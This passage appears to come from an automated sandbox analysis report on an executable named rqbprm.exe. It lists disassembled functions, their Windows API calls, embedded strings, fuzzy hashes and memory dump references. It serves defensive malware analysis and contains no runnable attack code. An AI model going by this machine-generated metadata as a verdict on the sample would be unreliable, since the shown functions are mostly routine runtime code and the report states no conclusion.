                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: d0fee74332d9ddad230ed502816860f9122fb3a0dedcf44d562756efaff421fd
                                                                                              • Instruction ID: eb9f52c7b4a1e522e955fb53c742a21ca22374eade25fe8cb1caf89c2c2d43be
                                                                                              • Opcode Fuzzy Hash: d0fee74332d9ddad230ed502816860f9122fb3a0dedcf44d562756efaff421fd
                                                                                              • Instruction Fuzzy Hash: 7701FC7A6012117F232136F75C8CD7F6B6DDEC2B983140129FA04C2211EF60DE0197B4
                                                                                              Function 00C89869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00CA1030,00000200,00C891AD,00C8617E,?,?,?,?,00C6D984,?,?,?,00000004,00C6D710,?), ref: 00C8986E
                                                                                              • _free.LIBCMT ref: 00C898A3
                                                                                              • _free.LIBCMT ref: 00C898CA
                                                                                              • SetLastError.KERNEL32(00000000,00C93A34,00000050,00CA1030), ref: 00C898D7
                                                                                              • SetLastError.KERNEL32(00000000,00C93A34,00000050,00CA1030), ref: 00C898E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 9e59fc0299a11784817fbc5fe11543d38a30edb94010830ac66eda409459c2b7
                                                                                              • Instruction ID: 225399fb2a507780fc6549ba11e5b01acb27d0ca43b063b180fdbed5db93187b
                                                                                              • Opcode Fuzzy Hash: 9e59fc0299a11784817fbc5fe11543d38a30edb94010830ac66eda409459c2b7
                                                                                              • Instruction Fuzzy Hash: 3A012632100603ABC21272656C89B3F2569DBD237DB290036F410A22D1EF348D02A32D
                                                                                              Function 00C70EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C711CF: ResetEvent.KERNEL32(?), ref: 00C711E1
                                                                                                • Part of subcall function 00C711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00C711F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00C70F21
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00C70F3B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00C70F54
                                                                                              • CloseHandle.KERNEL32(?), ref: 00C70F60
                                                                                              • CloseHandle.KERNEL32(?), ref: 00C70F6C
                                                                                                • Part of subcall function 00C70FE4: WaitForSingleObject.KERNEL32(?,000000FF,00C71206,?), ref: 00C70FEA
                                                                                                • Part of subcall function 00C70FE4: GetLastError.KERNEL32(?), ref: 00C70FF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: d07d91f53de0fed0ffcdd4fc00361bb5c4bbed1d9e33b473ca155ed8fcac4e77
                                                                                              • Instruction ID: 012691ca4cb4b7c3acec037dad34391eaec4860536754c3a53d05d465aa3af86
                                                                                              • Opcode Fuzzy Hash: d07d91f53de0fed0ffcdd4fc00361bb5c4bbed1d9e33b473ca155ed8fcac4e77
                                                                                              • Instruction Fuzzy Hash: F6017172100784EFC7329FA4DC89BCAFBA9FB08710F10492AF26B92160CB757A45DB54
                                                                                              Function 00C8C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C8C817
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C8C829
                                                                                              • _free.LIBCMT ref: 00C8C83B
                                                                                              • _free.LIBCMT ref: 00C8C84D
                                                                                              • _free.LIBCMT ref: 00C8C85F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 5e081f2d12b1ff62f5f727a0cfe8573fed81212436d180fbb39008273001ec18
                                                                                              • Instruction ID: c73af0360e9378a7a691bf0ae715227236434819ddaabd76e40f6f71b17182f4
                                                                                              • Opcode Fuzzy Hash: 5e081f2d12b1ff62f5f727a0cfe8573fed81212436d180fbb39008273001ec18
                                                                                              • Instruction Fuzzy Hash: CCF01232544211AB8720FB68E4C9E1B73EAAB1071C795181BF118D7A92CB70FD80CB68
                                                                                              Function 00C71FDD Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C71FE5
                                                                                              • _wcslen.LIBCMT ref: 00C71FF6
                                                                                              • _wcslen.LIBCMT ref: 00C72006
                                                                                              • _wcslen.LIBCMT ref: 00C72014
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00C6B371,?,?,00000000,?,?,?), ref: 00C7202F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CompareString
                                                                                              • String ID:
                                                                                              • API String ID: 3397213944-0
                                                                                              • Opcode ID: 618109b13354653d4075f8de91e2ddc6437c53cdc923ec028cbc3354f56059a7
                                                                                              • Instruction ID: 12a8468efbb0ca741681e9799bac3ce557e93737eaceeef35de5a67537ea2297
                                                                                              • Opcode Fuzzy Hash: 618109b13354653d4075f8de91e2ddc6437c53cdc923ec028cbc3354f56059a7
                                                                                              • Instruction Fuzzy Hash: 5EF01D32008054BBCF226F51EC09D8E7F26EB44B61B119416F61A5A061CB72D661E794
                                                                                              Function 00C88900 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C8891E
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C88930
                                                                                              • _free.LIBCMT ref: 00C88943
                                                                                              • _free.LIBCMT ref: 00C88954
                                                                                              • _free.LIBCMT ref: 00C88965
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: ba66802b938809774ef88fa0eeb341d94aeecf8c68458e8a815676ec78c07d89
                                                                                              • Instruction ID: e271739e002192b4c8907d710a04b9a4272c4e3177f25627b0c28f213798c889
                                                                                              • Opcode Fuzzy Hash: ba66802b938809774ef88fa0eeb341d94aeecf8c68458e8a815676ec78c07d89
                                                                                              • Instruction Fuzzy Hash: 82F0DA72810523DB8B46BF14FD06B1D3BA2F724738782054BF524567B1CF714946AB99
                                                                                              Function 00C715FE Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 197COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _swprintf
                                                                                              • String ID: %ls$%s: %s
                                                                                              • API String ID: 589789837-2259941744
                                                                                              • Opcode ID: eb7eebdef4f5204e72e790102030b83843898cc09a1cbb5f5c6d7a7d9910c821
                                                                                              • Instruction ID: a12136d121c8c08317351016555e53628a70ecf659c868a666f5b395f7d346bc
                                                                                              • Opcode Fuzzy Hash: eb7eebdef4f5204e72e790102030b83843898cc09a1cbb5f5c6d7a7d9910c821
                                                                                              • Instruction Fuzzy Hash: 52510635288304F6EA351AADCD46F357665EB05B04F2CC507FF9E740E1D9A2A910B71B
                                                                                              Function 00C87F6E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\rqbprm.exe,00000104), ref: 00C87FAE
                                                                                              • _free.LIBCMT ref: 00C88079
                                                                                              • _free.LIBCMT ref: 00C88083
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$FileModuleName
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\rqbprm.exe
                                                                                              • API String ID: 2506810119-1769970242
                                                                                              • Opcode ID: cfb83c99cb8a6544fbdc0ed50004aae5f96be3583c908f474e7b34421920464c
                                                                                              • Instruction ID: 3dbf7cf4435b807737978c991af13b1535056d35bc20e3a07b16bd685a3997b1
                                                                                              • Opcode Fuzzy Hash: cfb83c99cb8a6544fbdc0ed50004aae5f96be3583c908f474e7b34421920464c
                                                                                              • Instruction Fuzzy Hash: 4131D171A00218AFCB21EF99DC81EAEBBFCEF95308F5041A6F50497211DB708E48DB64
                                                                                              Function 00C831D6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00C831FB
                                                                                              • _abort.LIBCMT ref: 00C83306
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer_abort
                                                                                              • String ID: MOC$RCC
                                                                                              • API String ID: 948111806-2084237596
                                                                                              • Opcode ID: 399a855455ee728c1a1d00965ffb5034b6ccb43de124892c90939ddbf609df87
                                                                                              • Instruction ID: 899c67eb2e1bf266f9e7e6a46bd379ddf41e5878b669396178daaa57fc06be53
                                                                                              • Opcode Fuzzy Hash: 399a855455ee728c1a1d00965ffb5034b6ccb43de124892c90939ddbf609df87
                                                                                              • Instruction Fuzzy Hash: EA416A71900249AFCF15EF94CC81AEEBBB5FF08708F148059F91467262D335AA51DB58
                                                                                              Function 00C67401 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 103COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C67406
                                                                                                • Part of subcall function 00C63BBA: __EH_prolog.LIBCMT ref: 00C63BBF
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00C674CD
                                                                                                • Part of subcall function 00C67A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C67AAB
                                                                                                • Part of subcall function 00C67A9C: GetLastError.KERNEL32 ref: 00C67AF1
                                                                                                • Part of subcall function 00C67A9C: CloseHandle.KERNEL32(?), ref: 00C67B00
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                              • API String ID: 3813983858-639343689
                                                                                              • Opcode ID: 748f049f14df0143ccadaf760c21d7bf6c019ff7a0c261ce4fbc4c07028dd1be
                                                                                              • Instruction ID: 6287a1bfa2aa39ecbcc7ba71fecf69a63aa7c34cfd74922295f58ac426cef7db
                                                                                              • Opcode Fuzzy Hash: 748f049f14df0143ccadaf760c21d7bf6c019ff7a0c261ce4fbc4c07028dd1be
                                                                                              • Instruction Fuzzy Hash: 3B31C671D04258AADF31EBA4DC89FFE7BA8AF05308F044555F856A7182DB748B44DB60
                                                                                              Function 00C7AD10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7AD98
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00C7ADAD
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7ADC2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: ASKNEXTVOL
                                                                                              • API String ID: 445417207-3402441367
                                                                                              • Opcode ID: a7909fac08b3c9fb9bab27865376aea9eb2e8d7eb94a1a03e18eef8f6fd55a8e
                                                                                              • Instruction ID: 6ac3ba200f931a73eca27b56329128a1ae31c0f5171760494aa16eb3bb7c4a59
                                                                                              • Opcode Fuzzy Hash: a7909fac08b3c9fb9bab27865376aea9eb2e8d7eb94a1a03e18eef8f6fd55a8e
                                                                                              • Instruction Fuzzy Hash: 5B11B632340200BFD7319F69DC85FAE7B69EFAB742F044010F645DB5A1C7619A159726
                                                                                              Function 00C6D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __fprintf_l.LIBCMT ref: 00C6D954
                                                                                              • _strncpy.LIBCMT ref: 00C6D99A
                                                                                                • Part of subcall function 00C71DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CA1030,00000200,00C6D928,00000000,?,00000050,00CA1030), ref: 00C71DC4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                              • String ID: $%s$@%s
                                                                                              • API String ID: 562999700-834177443
                                                                                              • Opcode ID: af5c037ef2bba74981c162fb870ea4928df50686ec1491cb76fc5e41ad1981e5
                                                                                              • Instruction ID: 18685dd687d7489dfeb54e6a2420859153cc8840e04f18827539f02dd9189691
                                                                                              • Opcode Fuzzy Hash: af5c037ef2bba74981c162fb870ea4928df50686ec1491cb76fc5e41ad1981e5
                                                                                              • Instruction Fuzzy Hash: BF21A572940248AEDF31EEA4CC85FDE7BA8AF05704F044022F912961A2EB71D648DB51
                                                                                              Function 00C70E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E85
                                                                                              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E8F
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C6AC5A,00000008,?,00000000,?,00C6D22D,?,00000000), ref: 00C70E9F
                                                                                              Strings
                                                                                              • Thread pool initialization failed., xrefs: 00C70EB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                              • String ID: Thread pool initialization failed.
                                                                                              • API String ID: 3340455307-2182114853
                                                                                              • Opcode ID: ec1addc2bc2f23001764274c3954976f2ccf9b7e9c787575e1ae524c89ffbfd0
                                                                                              • Instruction ID: b5910e18e710d52a923429c5cba9d9be492b6ee9e27e03d4776c0519b9a84348
                                                                                              • Opcode Fuzzy Hash: ec1addc2bc2f23001764274c3954976f2ccf9b7e9c787575e1ae524c89ffbfd0
                                                                                              • Instruction Fuzzy Hash: 2B114FB1640708EBC3315F7A9C88AABFBECEB55744F24882EE1DA82200D6715A418B50
                                                                                              Function 00C7B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7B2BE
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00C7B2D6
                                                                                              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00C7B304
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmpDownload File
